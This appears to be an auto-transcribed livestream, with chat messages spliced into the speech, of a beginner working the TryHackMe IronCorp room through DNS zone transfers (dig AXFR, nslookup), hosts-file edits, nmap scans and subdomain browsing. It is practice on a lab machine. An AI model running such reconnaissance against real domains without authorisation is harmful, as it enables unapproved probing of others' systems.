right, the left screen. Anyway, it says 5 to 7 minutes. So
SP4RKSK says,
box is easy if we know the vulnerability.
Yeah, exactly. It's easy then, or it's easy if I have a. I always want to try myself on things, but if it's something that I'm all new to, so it's possible with this. Though we did watch this video, and since I worked in IT and I kind of know how DNS works, we just made some notes to Obsidian here about DNS. So, and I also looked in the help to exactly, this is kind of obvious as is type, but still, and it's nice to have it in the notes, you know. So we have lslhost. So we run these commands and nothing worked. We tried the dig ones, nothing worked. And since Generalisma had done this morning, and everything worked for him, we tried to restart the box and it wouldn't stop. It wouldn't stop. It didn't even help with the timeout. But next time I will log out and log in again. And hope that login works. So these are the notes from this video. And it was these 4 things. Or rather, that this works on Windows too. And someone told me, why not try U when I wanted to underline and it's not in markup. So we added that to notes for Obsidian too. So lots of learning already here today, and my main goal is not to be like solve the bugs speedily, but learn as much as possible along the way. We have this information from the bug so far. This is the old IP, this is the scope, and then we have this information from Nmap. As I said, I'm kind of noob, very noob. This is as far as we got on the DNS bit. I looked at the web pages too, but this was a suggestion to go the DNS route. So we're doing that. And learning. And that's the point. So let's see if the machine is actually... It's had a few minutes now. And yeah. So it suggested 7 minutes. We're just at 7 minutes. Because we want it to be actually awake, right? But this is a very good video. I recommend it, and I sent a link in chat before. We can do it again. So, good video to just, if you don't know what zone transfer is.
Web link.
And apparently he had a if you didn't get this, there was another one with more details on some things, whatever. I did not watch that one, so I don't know. Let's go back to that one. And also, on my stream, if there's anything, you know, you can give me hints and help, but I prefer to try first. And you can, if I forget to switch screens, this is the right screen where I have the VM. You can do exclamation mark right to switch to this one, and that's the left screen where I have the notes, and if there's a try-hack me we're reading or something, it's on that screen. So you can switch to that by exclamation mark left. There's also channel point redeems, and we have these recently added today, the lockpick redeem, and we have a few move it redeems to keep the brain working while we're doing this. So, let's actually do something now. We have all of these commands that we have tried, and we have them all here. So let's go up, see, yeah, the host file, that was a good reminder, because I actually hopped in here already, so we just have to add it, the IP address. So, wrong one. For the bugs, let's actually add the IP to the notes so it's updated. And I'm just adding the restart of the restart and the new IP there quickly, so we have it. So let's add it. 112, 107. There. So let's go back and try this. So the first thing we tried is this command, and I'm clicking just to see that I have the notes that I'm actually doing the command. And before we got this is as far as we got. Then it stopped working. So if we continue to should I type things, you know? Well, we can just do this. See if we get a different response now. No. There. So the host ones didn't work very well. We were also trying other things. So the dig, this is a dig command that was suggested in the video. So type name server, and we get the same information that we already got from host command. So let's go back and see the second dig. Yeah, it's AXFR and the domain name, and then @ and the name server name. So, and this doesn't work, which it didn't work before either. And I was like, what above domain? Do they mean that we should use ironcorp.me? It doesn't seem to be much difference from last time. Anyone with suggestions, they're very welcome to. And the next time, let's just type from now on, because we also had the NS lookup ones. So if we do the NS from the video there, oh sorry, I'm typing, where am I typing? Nowhere. NS lookup, and just that, nothing else. Then we get this prompt, so we could set the type to NS. Oh, have to move the mouse there, and we're on the right screen, which is the right screen. Set type NS, and then we do the domain name, and the domain name now is of course ironcorp. Ironcorp. I always, every time I type copper.me. So this information, it's the same, you know, with the addition address, server address. Okay. We get this IP. Can someone tell me why we would have a 192.168 address now on this, and why we have above domains.com? So let's see what it was doing after that. It did server and the name. So NS
Generalissimo for 69 says,
do the IP instead of NS1, the IP of the machine.
Yeah, okay, so instead here, let's do the IP of the machine. So 10
with the dig command, D.
With the dig. Okay, you want to do it with the dig. Okay, but in this now, so we can do this first. I'll do the dig, I promise. So just let's do it with the, oh my god, I'm typing in my notes. So 10, this will be quick, I promise. I'll go there. 197. Default server, switching to the different nodes here. So I don't remember what they got, but I think, yeah, this is setting the server. Right, and then we do type any to say that now we don't want just NS. Oh my god, I'm typing again in the notes. This is so annoying. Sorry. So let's do type is any now, because we don't want to name servers only. I misspelled. Type any. So if we Control C, that will pop out and we'll have to redo it all. Okay, we'll do the dig one first. We'll do the dig one, and we should have it with the old IP, right? No, that's whatever. Let's use this one. Yeah, we have used it with the old IP here. So IP was, I should have like a post-it on my forehead, so that I can look at it in the camera view on my OBS with the IP of the box, right? So 112, and what did I do? I typed it in the box, in the notes. 112, because I clicked to switch tabs there. 107, there. So, we did get a reply. Amazing. So we got information, and now, since I'm not really just wanting information, I wanted to test all the things, to learn all the things. I will do the NSLOOKUP way too, but let's copy this to the notes because this is interesting. So let's just go to the notes there. And this is where we actually have the information. So SOA people, what is this? I have to Google, I guess. Let's do that, cause that's the right thing to do. So DNS SOA. SOA record. It's a recording case who's responsible for that domain. Okay. Okay, so it's who's responsible for the domain. If we do this, source bar of my domain or zone, such as email or administrator. Domain was not updated. How long the server should wait between refreshes? So it's of refresh information too there. Okay. Also, I think that yeah, you're on this side, so you can see this. If we look at this info and compare it, we have this computer name, which was there. So this is the information we had in the SOA. So if we go to the DNS one, this is the same name. I recognized it. So is this then the update information? Wikipedia could be sometimes too much information, and sometimes good information. So this is kind of good information. So we have 1, 2, 3, 4, 5 numbers, and now we know what they mean. That's nice. We of course have the dot and no parentheses or anything. Oh, but it's the same thing. Let's just add these. This is interesting to the notes. So SOA and just making sure you're seeing my right to the right screen.
New follower Twitch.
Welcome in.
New follower BitSpectre. Less than 3.
Welcome in, BitSpectre. So let's see here. So okay, it's start of authority record.
Spectre says,
"Howdy there."
Howdy, howdy. You're very welcome in here. We're trying to do a box that is hard, but someone or journalism said it's easy. We'll see. We'll see. I'm learning lots of stuff. That's the point of this. So let's just copy this because we can and we're lazy. So this is, we don't need that bold, and it is actually, there was good explanation here before. This one. So imported information about a domain. this is a good text, simple text explanation. And I do like to type my own, but since we're we got some people in here, I don't want to use your time in a bad way. And here this is just, well, the numbers. We can keep them at this, but for us, let's add our numbers. We have the number 3 as the first one, and I would assume this is the same, right? The order. And the second one is for us, oh gosh, I hate this, because now if I delete now, I get the first number now, and if I type here 9, it pops there. Not logical. So, and then we have 600, and then we have 864, and because this makes it obvious that this is what I mean from what we have up here. I don't know anything what this is yet. I'm just learning that a new I didn't know this type of DNS, or I've never noticed it before, let's say that. But we also got that we have admin and we have internal, and we didn't have those, so that's very interesting information for the box, not just for learning. What else? It's still red. The YouTube link is still red in mine. I will add more related stuff to this on the YouTube, I promise. I have this Python course I'm working on. So let's just continue. So we got that this machine was just a machine. We have the IP of, I would say, it has these 2 DNS entries here, but this is the machine that's responsible for this information, for this domain, for the domain. And the name server is also. So, yeah, so we got the name server here. This is actually, why didn't we get this reply before? Because I would have imagined that if we check the if the name server for this one, but maybe we would have had to check it to this one. We'll do that just to make sure that it works as it should. So let's also add, we have this dot this, which is the name server. So name server. Oh, let's just do NS. So nothing else here really. Yeah, right. Maybe the update information is interesting. Anyway, we have it here. Okay. So we have gotten some information here. I don't know if this is interesting yet, but this is very interesting information. So let's add it here. Well, if the name server, that this is the name server, is kind of interesting. So let's just see if we ask it for the name server. That's what we did, but with the IP, you know. No, we don't have to do anything more, I guess.
Goaku says,
we could add these.
I just rejoined. Was there a raid before? Your stream is getting popular.
Yeah, got raided. So I hope it's getting popular. I hope to learn a lot from a lot of knowledgeable people and maybe be able to teach a bit too. This is not the thing I know anything about. This is new to me and I love it. So let's see. So welcome back. Let's see now. Just to repeat myself, we could add these to the host file. That's my thought.
Less than 3.
It's funny that it's got the localhost IP in the DNS. Oh, that's kind of funny. Would a DNS do that? Never, right? It's odd. So let's put them in our host file and let's check them out. So why is this up? Because this was from another box, and I deleted the ones for this one because we were trying to remove everything. So we had the host files up just recently, but it was long enough ago to have to type the password there. So let's just add these. So alright, we have it already here, and it's just space, right? So we have lazy me copying the name from the notes, and I did forget to switch screens, and then you can do exclamation mark right if I forget, because I will forget. I have to click twice for it to be able to find it there, and then we'll just do add admin and remove this. which was the laziest to delete all those characters after pasting, or just typing ironcorp.me. What do you think? which is the laziest? Let's try typing it now. I have to actually remember to type R before P, because my fingers tended to do it the other way around. So now we have them there at least. I think I spelled the stuff. I copied the crazy one. The crazy one is copied. So this is the DNS stuff. Before we continue, I want to do this now with NSLOOKUP. And we did do all of these before I mistyped type. So let's not misspell something and it goes crazy. So if I do first set, and again I'm typing in the notes, I gotta learn this. I have to switch, and you can see the right screen. 8.5 hours, my goodness. So set, type, and everything, every time I type it, I will remember it more. So no copying here. Set type to name server, and then the domain name, which is ironcorp.me. Yeah, it's just like this. And then we get the name server's name. But we now know the name server's name. So let's just ignore this and do the actual one, which is very long and that I just happen to have in the paste. So we have the name of this server. So we do that. And it got also the IP and port of it, and it uses the number character to the port, and I've never seen that, so that's interesting. Number 53 of the IP. So then we're supposed to do type any, because now we don't just wait a sec here. Did I miss a set? I think I did. So let's go back to the actual YouTube video and see if we can find the spot.
We then have.
All right. Oh my goodness. Did he talk so slow when you had it to 1 speed? Maybe it's just that I am. Yes, it's set type NS, and then set.
Christy says.
Same box?
Yes. Now it's started again. So now it continued on Windows, so it's showing us that we could do this on Windows too. And this is what I'm actually looking at. So let's see what he did. Because I kind of assume that it's set type here too. Oh gosh, let's mute it. I just want to see the command. So it's working again. I just want to see what he types now here. Server, and we did this with the server. Oh my goodness. I'll speed it up a bit. And we got our information there, and yeah, of course. So it is set to type. I just typed wrong in my notes. So I just wanted to confirm. So my notes are not complete. This should be set. Of course it should be set type again, because we use set type for set type ns here. It should be set type any now. So let's just go back to the box and do the set type. I'm clicking double times now to type in the right place. So if we do set type any now, there, and then we do lsd domain. No, my goodness, that's what's in my notes. So let's just paste and delete, so I can't type wrong stuff again. So that's the command, and that's nice. The ls command is not implemented. So now I need help from chat. The information from the YouTube video that this works in Windows. How would we do this on Kali? NSLOOKUP to list this. Let's try doing help. Will it assume this is like a server name, or will it understand that I want help? It's not yet implemented. Okay, so ls is not implemented and help is not yet implemented. The comment was though that this is for Windows, and he used it on Windows, so maybe we should just skip it. Anyone in chat that can help me, that knows this stuff? And I should not forget, just when I was starting to eat, the raid arrived, and I was like, oh my god, we have to get going, right? And I forgot the food. Since we have the information,
Generalissimo for 69 says,
You got the subdomains.
I have put them in
Insert them in the hosts file and check them out. Smile, fix it, smile.
Yeah, but I just wanted to, before I added them to the host file, but before I actually tested them, I wanted to see how the NSLOOKUP one worked, and the command doesn't work. So that's that's that. So I'm capitulating, trying all the things, and will continue forward in the box. I will.
Probably doesn't work.
No, it doesn't work. So we noticed. Though,
I just gave it as an alternative but didn't test it.
Oh, no, it was from the video. It was from the YouTube video. So let's see. And he used it on Windows. So that was the Windows alternative. I'm sorry for copying everything. This is so that I will not lose these notes in case I do something odd, like running a script. The other day I ran a script that used Claire. So I don't want to lose the notes again. So let's just... this was on the DNS information here. So I will just paste this at the bottom of my notes there, switching so you can see what I'm doing at least. So putting all the DNS testing things just in here. So in case I want to look back and I want to make better notes of this later, but let's continue with the box now. So let's go. So let's make a new tab actually here for next thing. But first, let's try these domains. First, let's just try the one itself. I don't think anything will happen with the DNS server name. I'm just copying the next one at once. So let's paste that one. I'm trying to select the text, and Obsidian is giving me trouble. Now the thing is that we did access to web pages on other ports, so let's open those two. They're just doing nothing here, so I'm thinking the ports, you know. So the information we have so far here.
Nmap scan fix it.
Yeah, we can Nmap scan.
FixerBot says,
welcome
Raiders. Browbeats2 brought 1 friends to the party. Go drop them a follow. Browbeats2 says,
I welcome all raids. I welcome all raids. They're all great. So welcome in and thanks for the raid. So I was just reading in chat. Let's see if it can manage to scroll up. No, there. So, yeah, you said Nmap scan there, Generalissimo. I will do it. When I get one, I just want to open those two others up too. I know that this is not what I should do probably, but since we had those pages up before, why not open them again? Because it's kind of interesting, you know, to see. We could of course use the actual what I have. No, I didn't have that there now. Let's just do the IP. I'm sorry for not following your instructions, Generalissimo. I know you want to help. I just want to try everything that what would I have tried, you know? So, but I know this one is probably too hard for me, and I need help. Oh, I'm sorry. So, let's. We have the ports. It is well, one of them is just 8080, and it sends us to HTTPS. And we have this thing. That the first thing I would have done would have been to look into this. And then we have the other one, which is this, and 11025 from the notes there. So the first port goes to this page. So I would have kind of looked into what this is, and then we have this page. I just closed everything down before, and these look. No, it's just the names there. So let's continue with these.
FixerBot says, welcome Raiders. Age of Music brought 2 friends to the party. Go drop them a follow.
Thank you so much.
Said,
thank you so much. Thank you so much for raiding Age. You're very welcome in.
Panda Tongue says,
I
hey
guess
guys.
you did music. I didn't ask you, by the way, for... Hi, Panda. Welcome in, guys. Brobeat SC2. I didn't ask you what you did on your stream. I think I have an idea what Age was doing, because he's always playing the amazing bass, you know? I don't even know how to fake play bass. Lots of moving for the chords and a few lots of movements of arms and fingers and things, you know. So this is lots of raids. Thank you very much, people. So we were just...
It's all practice and muscle memory at this point.
Browbeats2 says.
I did some easy hack the box machine. Smile. I am still a noob learning. However, some people left because it was too technical. The other left because I was being stupid, but I learned new stuff. Smile. So all is good. Smile.
Oh.
H says.
Oh.
I hope you have a great morning.
We didn't do shoutouts, people. We have to do shoutouts. So of course we'll have to start with Gar. I didn't shout out, but everybody knew him already, right? If you didn't, Gar_7. And let's do a shout out here. And we just had two raids at once, so I'll have to do one at a time. Shout out and Browbeat SC2. There. So, oh my god, what? It's saying unrecognized command. Did I misspell shout out? Typing very slowly. Shout out. Browbeat SC2. Control AC before I enter there. Yay, we managed to do the shout out. And I'm clicking the follow there.
Browbeats2
I will
says.
look into your stream next time.
Which country are you from, if I may ask? Smile, smile.
I'm Swedish. I'm in
thanks
Sweden.
For the soul. Smile, smile.
Yeah, and I'm going to... I think there's a timeout, right? We can try doing another shout out at once for Age. Age is very...
greetings from Germany.
Oh, you're Germany. So we're the same time zone. That's always nice, you know. Not people starting streams at 3 in the middle of the night when I'm asleep. So let's see. Shout out. Age of music. When you know the name, even if you don't, I'm trying to scroll here. Let's see if it tells me you can't shout out again. We'll see. Yeah, I had to wait 1 minute and 2 seconds before I do another shout out. So we'll just have that waiting there.
I do that too. Smile, but on weekend, when I do hacking or programming, I usually have humane times. During the week, I mostly stream video games. Smile, smile, smile.
Okay, so, nice. Yeah, so you have a holiday today too, man? Because that's why my stream is so long.
Yes, smile, smile.
Yeah, so we have a holiday today in Sweden. So that's why I would have been streaming kind of now, though, even if it wasn't a holiday, but I wouldn't have started as early. I would have been working for a few hours in the morning. So, Age, were you playing bass? I don't have to ask you, answer another question, right? You would have said, no, I was actually doing did if you were doing something else. Yeah. So we're just looking at the prompt. So people that just arrived have no clue what we're doing. So let's just take a quick look at the notes.
Fixerbot says. New follower Browbeats2.
Thanks for the follow.
Less than 3.
For the follow. We got the tip of this box from Generalissimo that this hard box is actually easy. So we're going to see, we can definitely learn stuff from it, and I'll learn stuff. So we started with an nmap scan, and with the IP we had first. We had to restart it because strange stuff, you know. And we found this information out, and then we didn't, this is just empty, I've not added anything. Then we checked the DNS information here, because it has DNS running on it from the nmap, and we found actually finally the reply after restarting and failing to terminate the machine. We got that. And we had these that we have added to the host file. Maybe I should like type added to host file. Let's do that. Added to hosts. And this is just where I collect the information, and this is what we learned about DNS, that we can use these commands. And I will make public notes, but they're private at the moment, if anyone doesn't already know this. Oh my god, we have so many extra duplicated tabs here. So let's we were just about to nmap these new ones that we got. So let's go back to the information so I have these easily available, because I don't want to type this one. That's kinda a hard one, right? So right screen, and I will actually click it this time, and on the suggestion here we do an nmap of them, and let's do, if we this is very interesting to me because I've never ever nmapped another name like this. And why would it, oh, this is all parts. Maybe we should start with a quicker one. There. So I have never done this. I have never nmapped anything else. So let's do that one then. I just to repeat myself and actually finish the sentence, I've never done nmap on a name like this. So Generalissimo, could you please explain why are we doing this? Why you suggested us to do this, and of course I realized that there could be like, but don't we just go to the same IP address and it would have the same ports open? I don't get it. Why would we want to do this? I don't get that. Follow age of music. Follow age.
Christy says.
Did you add that name in slash etc slash hosts IP and name?
Right, it's added.
So it can be resolved?
You could also see that, well, it's not pinging, of course.
Browbeats2 says.
Thank you.
Have a nice meal, smile, smile.
I'm just... If anyone is annoyed by me chewing, please tell me. I can mute, you know, when I'm chewing a bit. I have this broccoli and cheese pie that I need some energy, because this stream is like 8 hours and 45 minutes, you know? I need to eat something. So I went and heated up a pie.
Says.
Scanning the same IP with that domain.
Yeah, I know. But how would the IP respond differently?
Why? D.
Yeah. Because I know you can have like, if it was an HTTP server, it would look
It
this.
won't.
No, I mean, so why would I do it? I don't get it. Why did you tell me to do it? What should I nmap instead?
Oh. I just was referring to the nmap scan earlier.
Okay. So
to look at the ports.
Yeah, but we have the ports. It's right here in the imported information.
It was when you tried to get into the subdomain with ports mentioned.
Yeah, and it worked fine, you know. Okay. Yeah, but okay, we can try them with the port. And that was that was a thing I was going to try, but I wanted to try your thing first because I tried my things, you know, before. So let's go back to what I was going to do then.
Cocaine 1 PT says.
So, because I opened these and I was going to continue to do these with the
says.
ports too and see if we got something else.
Just
and
surf, smile.
And I have not even looked at these, you know.
And so on.
Because you said the DNS thing, so that's why I didn't look at these. Let's just see.
Generalissimo for 69 says.
Cocaine finished this easy machine to smile.
Okay. Oh my god, I just have to switch ears again, because I've had this in for hours, you know, in my ear. And it starts to itch a bit. Wrong side there. Oh, let's see, is it charging? I think so. Oh gosh. Someone say something so I can know that I can hear it. Oh, what was that? That fell on the floor. Sitting for this long, I have to change how I sit a bit. So let's continue. We have the port here. It's just 8080 and 11025.
Browbeats 2 says.
Oh my, this you call an easy machine? X, I was just busy busting a machine where all I needed to do was download a Wireshark cat file with FTP credentials in it. D.
Oh, what machine was that?
I would be completely lost on such a machine.
Yeah, I wouldn't say that this is easy. Now let's duplicate these tabs just to test all opportunities and see if we actually get something else on this. We could of course do this too, but yeah, let's just do everything. Yeah, me too. Though I have worked in IT, so some parts of things are kind of, you know, stuff connected to knowledge that I already had. So I guess if I was like even more noob than I am, I might not even have known what a port was. I don't know. Colon 110.25.
I am a programmer as well, but still. Pen testing is a whole different level. It's so fun to learn so much new stuff there.
Yeah, I agree totally. I agree. So to be really lazy, I'm going to copy the one that was hardest, and let's do colon 8080, and let's do port machine. All of these at the same time. We also have these already up, so we haven't even looked at it all. That I feel are like abandoned. Let's see if we kill the port machine by just doing these at the same time. I know that these triacre machines are not very... And this is a Windows machine. But this shouldn't be hard for it, right? Oh, right, it's going Google. So this failed. 80. No, not 80. Oh, that's funny. Why did it say 80?
Generalissimo for 69 says.
Speaking of programming, I just built a J's terminating all machines on THM Fixit. That would work for you.
Okay. Cool. So, this one still hasn't finished. This one also gave me the funny error of port 80 when it's 8080. And this one is just nothing, or they're still trying. Is this one still trying? No. I kinda 1, 2, 3, 4, 5. Yeah, so this is the only one that Googled. The others didn't Google. Why did this one suddenly Google? So if they move over to HTTPS, I'm fine with that, but well, is this supposed to give me something? Oh, we got finally 8080 there. Let's just start looking at this thing.
You have VS port and Apache port.
Yeah, I do.
Now check the subdomains you got on these ports.
So, this one is admin with one of the ports. This is admin with the other port. This is internal with one of the port, and internal with the other port. So these are these, and I used also the machine's name, which is the DNS servers with both ports, and they all just go nowhere. But I have these two from the ports and the IP. They work. So, and these we got up before we even started looking at the DNS too. And I've not even looked at anything there, so it kind of feels a bit wrong for me not to look at them. I'm very curious what's supposed to pop up on these, or what we're supposed to find, you know. So the browser, if it's redirected, you know, and it's dependent on these. The subdomains, of course. Yeah. I'm curious. Did I misunderstand what you wanted me to try again? Or should I just try what I was going to try? So I haven't even looked at source for these. Not even that. And I know that I should probably like turn off dark reader and stuff before looking at the source. But we don't want bright light, do we? But we can get lots of more.
Christy says.
We can't see the terminal.
Oh, sorry. Oh gosh.
If you're doing SMTG there.
No, I've never heard of SMTG. You know? I told you, I'm a noob. What I did is I opened these all with both ports in the browser, and I have gotten nothing on that.
Generalissimo for 69
I
says.
got these.
SMTH. For something.
Christy says.
Okay, something.
Something equals SMTG.
I've never heard that. So here. So this is, I didn't do anything on the prompt. These are the ones I got from just doing the IP, and this I did like when you told me to look at the DNS instead first. So I looked at the DNS and we found these names, but when I use these ports for both of the I don't get anything on these. Of course I can turn off burp. Sometimes that's funny, you know. So if we do just the same thing again. Don't Google it now, please. I'm like,
Fixerbot says.
This is too hard for me.
New follower Twitch. New follower Perky101. Less than 3.
But I would like to see, you know, if you get, I've never heard of this. I would like Google this and check out what it is. But if you tell me that that's not what I'm supposed to do, fine. So I don't think burp was the problem. We will definitely get different errors. We'll see. It takes too long to just work anyway. Welcome in! Perky 101, welcome in. I just started reading here, right? Because, you know, we could enter something here. That's interesting for me. So that I would have looked there first. Oh, it's supposed to have music too? Muted loop. So let's look at them now. Timed out. Timed out. So they all timed out. And we got no replies. So Generalissimo, was this what you intended me to try? Or did you mean something else? Because I have these ones here that I could look into. So what I have learned is that this is one of the ways where you can find
Generalissimo for 69 says.
Yeah, but I tried that
Web
one.
link.
Yeah. It's this one. See? Oh, I mean it's this one. Nothing?
Christy says.
Normally you would
Yeah,
look
yeah,
for
but
application
I have
versions,
this all
important
paused
comments,
because he's
related
told me to
files
check
when
the
you check the
DNS.
source of a website.
Yeah, so the first thing I would have Googled this to find out more information about it. Maybe Google this and exploit and looking like that. And we have stuff to enter here, and I have not clicked anything on this page yet. So I'm just curious what I'm supposed to find on this page.
Generalissimo for 69 says.
Is web link.
Gumby says.
Hi Gumby,
Hey Fixit, what
welcome
are you
in.
working on?
Welcome back. Yeah, so I'm just curious, Generalissimo. Is the machine not working as it should? Should there have been something here? And is it not this? Because this is the page, you know, that I get to when I use the IP, and it works.
Generalissimo for 69 says.
Yes, there should be. No, this.
Yeah, so not this. So there's supposed to be something here,
Cocaine 1
and the
PT
machine
says.
doesn't work as it should.
Generalissimo for 69, this is the way.
This is the way.
Did you edit to your host's file?
Yeah. I can. Let's double check
Goaku
it.
says.
Was that you sketching with pencil?
Sketching with pencil. Oh yeah. Oh, wasn't me. So let's look back.
Christy says.
If we can up arrow.
It doesn't resolve the name.
So did I mistype something? We'll see. So I shouldn't start talking in the middle of the password.
This is why page is not loading.
Okay. So. Oh, it's the wrong IP. I just changed half of it. I changed half the IP, I think. Okay, that kind of explains it. I was like, what? No, not problems again. Everybody laugh at me. I changed half the IP. Half of the old IP and half of the new one.
Goaku says.
Is that like
Dick.
streaming for 9 hours?
Translated from Dutch. Gumby says.
Yay, it will work now.
Christy says.
Yay.
Nice, always check those tongue.
So I was like, why? Okay, so now we'll. I know that you wanted the admin one, but let's just check all of them. And by the way, let's
Gumby
add
says.
Burp back.
Refresh the page.
Yeah, I did. But this is not the one that's supposed to work, right? So now we'll burp on. Refresh all the pages. I was kind of thinking I should do one at a time. And this is the one you said there should be a response. Also, we'll probably control Fi, right? Or will it not look again? Since it found the DNS.
Generalissimo for 69 says.
No.
They're probably intercepting Fixit.
No, I'm not. I checked it before. It's not intercepting. Not the best day for this, right?
Christy says.
Maybe intercept is on?
No, but I'm thinking, let's just close this thing down. In case it's like, oh, let's not check the DNS or the host file or anything. Let's just go with what we had. You know, and maybe this will help. Now there's a timer too. So, this problem is from us having to restart it. And me entering half of the IP. It used to be 10.10.71, 183, and did I actually type the whole right IP now? I have to check again. Oh gosh, why did I? It's supposed to actually. It should have been hosts at once there. That's interesting. So let's just double check. No, there's another error. Maybe I shouldn't stream for 9 hours. So let's just double check all of it before I control exit. All of it is there now. So I'm not blaming anyone but me now. If this works at once, at least. What's your time to do this, Generalissimo? With all your knowledge and everything, did you do it in like 5 minutes?
You okay? It happens to the best of us.
Oh yeah, that's like more like a tired error than a knowledge error. But I'm not feeling tired. But I did drink a bit of energy drink that I haven't drunk in months, or like at least in weeks.
Generalissimo for 69 says.
I'm not an error expert.
No problem. I'm just happy that you're here to help. But I'm kind of curious too, you know. Wouldn't you just start looking at these? Yeah, it's still working. Because I was thinking, are these slow now too?
Gumby says.
That would be interesting.
Stop it and refresh.
The machine? Or this? Because these, they were a bit slow, but they popped up. And the one I started the first was already... I'm control F5ing again. So let's just do a simple
Maybe try
ping.
that other IP.
So let's just ping it now. It's the admin one was the one that was interesting, right? It should be this. So I'm just oh, it didn't reply to ping. I don't think it replies to ping.
Maybe trying that other IP.
What other IP? The old one. That was before we started the box. Oh, sorry. Just checking.
It may be trying to open the one you had before the change.
Yeah, it might be. Let's just kill it again. Just restart Firefox. And I'm thinking there's this timeout of the DNS values. This is a good learning opportunity.
So if you stop it and refresh the tab, it will pick up the new IP.
Yeah, I have. I have 5 times. Like, so it stopped itself, and then I've done refresh though, probably. Is there? Yeah, there's a stop here, right? And do it again. This box just stopped working before, and I had the same problem the other day, so I'm not very surprised if it's just unfortunately track me, and or the machine being like, don't do several things at once. Should we do something else on this box? I feel this is boring to people to watch this. Do
you have to connect to a VPN?
Should we see that the VPN is still up? But seriously, we just refreshed these pages and they worked. I'm sure they'll work again. Some web pages can't work and the VPN not work, you know? So these still work. No critique of your suggestion. It's a great one. It's just me being annoyed at the machine. So I'm just checking here if I had any messages. I'm going to my brother tomorrow and celebrate and eat some dinner and stuff. So I have to know.
Just some suggestions is all.
Yeah, it's great. Do suggestions, and if you have any more, because what I would have started, as I said, is actually looking at this. But if this is just like a rabbit hole, and I'm told to do something else, since this is a hard box, and I would never just try a hard box by myself, so I just started this because I got the suggestion that it was easy. And since I'm like, the suggestion didn't work, or did it? Because I can't connect, and I know that it was me not entering it. Should we just like restart this damn thing. We can just restart everything.
Make close out of some of the tabs and try a brand new tab.
Yeah, we could do that. We could do that. Okay, let's do that. So.
FixerBot says. New follower Twitch. New follower Ozoyu. Less than 3.
Welcome in, Ozoyo. Welcome in. And I'm sorry for the frustration right now. This is kind of annoying. So, but let's close all these. It's just that I don't want to type
says.
these again.
THX equals.
So, let's close all the machines tabs. I could close all of them, but... Oh, well, let's just close all the tabs here. This is another machine, so I'll have to redo it. So I think I'm at the level where I kind of know the number in my head, which is horrible. Let's at least look at it. It's internal. Dot iron corp.me colon 10 right 11.0.25 and we get the percent community error there. That's a suggestion where we want to go. I think that if this would have worked, it would have worked, right? I keep my webpage there at one tab to avoid the horrible new background of Kali. I don't like that one. It's ugly. I replaced my login background. And I don't know really, but maybe I should spend some of the day with my family. But one of my kids is sleeping. He's fell asleep in the morning. And he'll probably sleep very long today, I think. Because he's got a sleeping problem.
Gumby says.
Asleep in a good,
Can you link
good
the
way.
learning platform that you are using?
What learning platform? Do you mean TryHackMe? It's just TryHackMe. So let's go to the page here. And let's go to the TryHackMe page. And this is the machine, and it's a hard box, so I would never have attempted it, as I have done 3 boxes. This is my 4th box, you know, though I haven't completed this.
Christy says.
And I've completed 3
Web
ones.
link.
Translated from Estonian.
Yeah, well, let's link to this room too there. Thank you, Christy.
Gumby says.
Okay, at Iron Corp.
Fixit says.
We could always look at, since we got this again here, so we could always look at like a what do you call it, like a walkthrough thingy of it, and see if people. But we have people who have done it, so, and I have not even explored what I would have explored, but I don't want to rabbit hole if it's the wrong thing though. So. We have done nothing in just been hours, right?
You have burp extension up?
Gumby says.
Is Foxy proxy on?
Cocaine 1 PT says.
So we have.
It's blocking it.
We also tried to disable this. We can do it again. So I did this recently, but fingers crossed. Let's hope it works. This is too long for it working, you know.
It has to work now.
It's not working. It's not working, and it hasn't been working. So I'm thinking it's time to restart the machine again. We'll have to.
If it's not working, reboot the machine.
Yeah, we have to reboot it again. But this is the second time. So I'm starting to get a bit annoyed at TryHackMe, because how many hours have I spent on this?
Next, try just update the IP on host's file.
Yeah, right. That's kind of a good thing to do. And I did, but I didn't completely update it, all of it. You'll have to check now that I do the right thing. Okay,
Yay,
let's
but do forget
admin.
to log the new IP.
Cocaine1PT says.
And after that, go *I2 web link. Has to work. I made this box few minutes ago.
What? We're thinking here.
Generalissimo for 69 says.
Oh, we can do
Turn off
kill
burp.
Burp is not on in the browser now, you know. But we can exit it. It's not active as a proxy. I was going to restart the machine too. That's why I logged out of the VPN. So I'm going to restart my virtual machine, and I'm going to restart. So let's do this one too. Just making sure you can see. And let's terminate this. And I really hope it works. Yes, it worked. That's the problem we had last time. It didn't even terminate. So now let's just restart my virtual machine, and then we'll start it again. Just I should start it one now, right? So all right.
Says.
Collie stole
that
my
error
mouse
only
pointer.
pops up at you forget to forward the request in burp.
Forget to forward. It also pops up if the machine is if the address is not existing. So now we have a 7-minute wait until this machine is supposed to be up, and we have a machine here to log into and to start the VPN again. New start.
So somehow burp was still intercepting traffic somehow.
Oh no, we never got a new message. It was just burp was not intercepting. That was an old screen, you know, was just going round and round and trying. Okay. Why did you go to left screen? Hi, Guaku. There are Rolias.
IDK.
Funnier. Now you'll have to switch back to the other screen too.
Says.
Where you can see anything.
Ike, what is this left screen redeem?
Ah, now you know. You go to the screen where I have TryHackMe and the notes. And the right one, go to the right screen, then you'll see my virtual machine again. So I'm starting the VPN. So try the other one, try the right one now. There. They working. We debugging stuff.
FixerBot says. Time to move it. 10 squats redeemed. Christy
okay,
says.
we'll go for it.
D.
I really need a break from this, thank you. Thank you for some move it redeems. Though I have to fix a video pop up there. I have the video. I made
keeps her in shape.
One. Yeah, Goaku, thank you for keeping me in shape.
Says,
it's our duty.
Yeah, and I need a break from this eternal trying of stuff. So, first thing to do is to fix the host file. So let's do that. Then we will do the movie to movie. And no one had tried the lock picking redeem yet that I added now this morning. Though I'm bad at it because I got the lock picks Friday, and my hands tends to be tired. So, let's see the new IP. Let's remove all of it.
New follower Twitch. New follower 417H. Less than 3.
Welcome in, welcome in. Alright, is that it? Alright. Welcome in. So I'm reading, we have the IP, and it is, let's double check my typing now so we don't have any errors. 205.123. 205.123. There are no typos in this, people. Double check me. No typos. Are there typos? Tell me. I'm saving it. There. Wrote 16 lines. We have write permissions. I've remembered to do sudo. We can see and type. And is it correct, right? Can we get a confirmation from chat?
Blizzardhook says,
fix it 42 like.
Yeah, good. So let's Control exit and
Gumby says,
looks good to me.
